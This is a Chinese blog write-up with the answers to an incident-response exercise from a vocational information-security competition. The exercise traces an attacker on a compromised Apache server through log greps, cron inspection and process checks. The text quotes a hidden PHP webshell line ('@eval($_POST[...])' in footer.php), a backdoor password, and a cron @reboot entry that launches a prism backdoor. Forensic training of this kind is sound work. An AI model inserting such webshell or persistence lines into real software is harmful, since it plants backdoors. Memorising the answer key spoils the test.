全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解

本文主要是介绍全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

第一部分 网络安全事件响应

任务1:应急响应

本任务素材清单:Server服务器虚拟机。

1.提交攻击者的IP地址

2.识别攻击者使用的操作系统

3.找出攻击者资产收集所使用的平台

4.提交攻击者目录扫描所使用的工具名称

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

8.识别系统中存在的恶意程序进程,提交进程名

9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

10.简要描述该恶意文件的行为


第一部分 网络安全事件响应

任务1:应急响应

A集团的WebServer服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。

本任务素材清单:Server器虚

受攻击的Server服务器已整体打包成虚拟机文件保存,请选手自行导入分析。

注意:Server服务器的基本配置参见附录,若题目中未明确规定,请使用默认配置。

请按要求完成该部分的工作任务。

任务1:应急响应
任务编号任务描述
1提交攻击者的IP地址
2识别攻击者使用的操作系统
3找出攻击者资产收集所使用的平台
4提交攻击者目录扫描所使用的工具名称
5提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
6找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码
7找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
8识别系统中存在的恶意程序进程,提交进程名
9找到文件系统中的恶意程序文件并提交文件名(完整路径)
10简要描述该恶意文件的行为

1.提交攻击者的IP地址

192.168.1.7

cd /var/log/apache2   ##Apache Web 服务器的访问日志文件error.log  ##Apache 服务器的一些操作通知和状态信息

然后在access.log.1文件里面发现了攻击者利用dirsearch扫描工具扫描

192.168.1.7user-agentDIRSEARCH,dirsearch是web目录扫描器。因此攻击者IP为192.168.1.7

2.识别攻击者使用的操作系统

Linux x86_64

##筛选出包含192.168.1.7这个IP地址的访问日志行
cat access.log.1 | grep 192.168.1.7 |more
cat access.log.1:使用cat命令显示access.log.1文件的全部内容。
grep 192.168.1.7:使用grep命令过滤包含192.168.1.7的行。
|:管道操作符,将cat access.log.1的输出作为grep 192.168.1.7的输入。
more:分页显示结果,以确保输出不会一次性显示所有结果。

3.找出攻击者资产收集所使用的平台

shodan

在任务二的基础上,我们再继续查看,可以看到:shodan 扫描器

GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php

4.提交攻击者目录扫描所使用的工具名称

dirsearch

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS

24/Apr/2022:15:26:35

cat access.log.1  ##查看日志内容

发现疑似攻击者上传一句话木马,并执行命令及反弹shell的操作。

验证一下,确实是后门

而我们看到,攻击者在24/Apr/2022:15:26:35该时间成功执行了命令,即该时间为首次攻击成功的时间

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

cat access.log.1 | grep 192.168.1.7 | grep ".php" | grep "200"

/var/www/html/data/avatar/1.php

密码为2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

/var/www/html/footer.php

他这里提示:web应用代码中的恶意代码

所以在 /var/www/html 目录下面检索

grep 'eval(' -r /var/www/html//var/www/html/footer.php:@eval($_POST['catchmeifyoucan'])
grep命令用于在文件中搜索指定的模式。
'eval('是要搜索的模式,这里表示要搜索包含字符串eval(的行。
-r选项表示递归地搜索子目录。
/var/www/html/是要搜索的目录路径。

8.识别系统中存在的恶意程序进程,提交进程名

进程名:prism

ps aux
netstat -antu

没有发现什么特征的恶意程序和脚本文件

crontab -l   ##查看有哪些定时任务

通过查看定时任务,发现一个可疑的脚本文件:

@reboot cd /root/.mal/;./prism

crontab -l命令显示了当前用户的 cron 任务列表。在你的输入中,只有一项 cron 任务,即在系统每次启动时执行 /root/.mal/prism 命令。这个 cron 任务是通过 @reboot 定义的,意味着它会在系统启动时自动执行一次。更具体地说,它会先切换到 /root/.mal/ 目录,然后执行 ./prism 脚本。根据目前提供的信息来看,/root/.mal/prism 可能是一个可疑的文件路径,因为它位于 /root 目录下,而且命名中的 .mal 部分也可能表示恶意行为。请注意,我不能确认该文件是否恶意,因为我只能通过提供的文本进行分析。
root@webserver:/# cd /root/.mal
root@webserver:~/.mal# ls
prism
root@webserver:~/.mal# cat prism 

恶意脚本文件中,有可疑的内容

root@webserver:/# ps aux | grep "prism"

9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

/root/.mal/prism

10.简要描述该恶意文件的行为

恶意行为:

每次系统重新启动,就会以root权限执行/root/.mal/prism脚本文件,从这里面的内容来看,这是恶意脚本文件是一个shell类的木马文件,这个是一个关于prism后门的恶意脚本

这篇关于全国(山东、安徽)职业技能大赛--信息安全管理与评估大赛题目+答案讲解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/536665

相关文章

综合安防管理平台LntonAIServer视频监控汇聚抖动检测算法优势

LntonAIServer视频质量诊断功能中的抖动检测是一个专门针对视频稳定性进行分析的功能。抖动通常是指视频帧之间的不必要运动,这种运动可能是由于摄像机的移动、传输中的错误或编解码问题导致的。抖动检测对于确保视频内容的平滑性和观看体验至关重要。 优势 1. 提高图像质量 - 清晰度提升:减少抖动,提高图像的清晰度和细节表现力,使得监控画面更加真实可信。 - 细节增强:在低光条件下,抖

软考系统规划与管理师考试证书含金量高吗?

2024年软考系统规划与管理师考试报名时间节点: 报名时间:2024年上半年软考将于3月中旬陆续开始报名 考试时间:上半年5月25日到28日,下半年11月9日到12日 分数线:所有科目成绩均须达到45分以上(包括45分)方可通过考试 成绩查询:可在“中国计算机技术职业资格网”上查询软考成绩 出成绩时间:预计在11月左右 证书领取时间:一般在考试成绩公布后3~4个月,各地领取时间有所不同

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提

poj 3104 二分答案

题意: n件湿度为num的衣服,每秒钟自己可以蒸发掉1个湿度。 然而如果使用了暖炉,每秒可以烧掉k个湿度,但不计算蒸发了。 现在问这么多的衣服,怎么烧事件最短。 解析: 二分答案咯。 代码: #include <iostream>#include <cstdio>#include <cstdlib>#include <algorithm>#include <c

计算机毕业设计 大学志愿填报系统 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点赞 👍 收藏 ⭐评论 📝 🍅 文末获取源码联系 👇🏻 精彩专栏推荐订阅 👇🏻 不然下次找不到哟~Java毕业设计项目~热门选题推荐《1000套》 目录 1.技术选型 2.开发工具 3.功能

题目1254:N皇后问题

题目1254:N皇后问题 时间限制:1 秒 内存限制:128 兆 特殊判题:否 题目描述: N皇后问题,即在N*N的方格棋盘内放置了N个皇后,使得它们不相互攻击(即任意2个皇后不允许处在同一排,同一列,也不允许处在同一斜线上。因为皇后可以直走,横走和斜走如下图)。 你的任务是,对于给定的N,求出有多少种合法的放置方法。输出N皇后问题所有不同的摆放情况个数。 输入

题目1380:lucky number

题目1380:lucky number 时间限制:3 秒 内存限制:3 兆 特殊判题:否 提交:2839 解决:300 题目描述: 每个人有自己的lucky number,小A也一样。不过他的lucky number定义不一样。他认为一个序列中某些数出现的次数为n的话,都是他的lucky number。但是,现在这个序列很大,他无法快速找到所有lucky number。既然

从状态管理到性能优化:全面解析 Android Compose

文章目录 引言一、Android Compose基本概念1.1 什么是Android Compose?1.2 Compose的优势1.3 如何在项目中使用Compose 二、Compose中的状态管理2.1 状态管理的重要性2.2 Compose中的状态和数据流2.3 使用State和MutableState处理状态2.4 通过ViewModel进行状态管理 三、Compose中的列表和滚动

系统架构设计师: 信息安全技术

简简单单 Online zuozuo: 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo :本心、输入输出、结果 简简单单 Online zuozuo : 文章目录 系统架构设计师: 信息安全技术前言信息安全的基本要素:信息安全的范围:安全措施的目标:访问控制技术要素:访问控制包括:等保

Sentinel 高可用流量管理框架

Sentinel 是面向分布式服务架构的高可用流量防护组件,主要以流量为切入点,从限流、流量整形、熔断降级、系统负载保护、热点防护等多个维度来帮助开发者保障微服务的稳定性。 Sentinel 具有以下特性: 丰富的应用场景:Sentinel 承接了阿里巴巴近 10 年的双十一大促流量的核心场景,例如秒杀(即突发流量控制在系统容量可以承受的范围)、消息削峰填谷、集群流量控制、实时熔断下游不可用应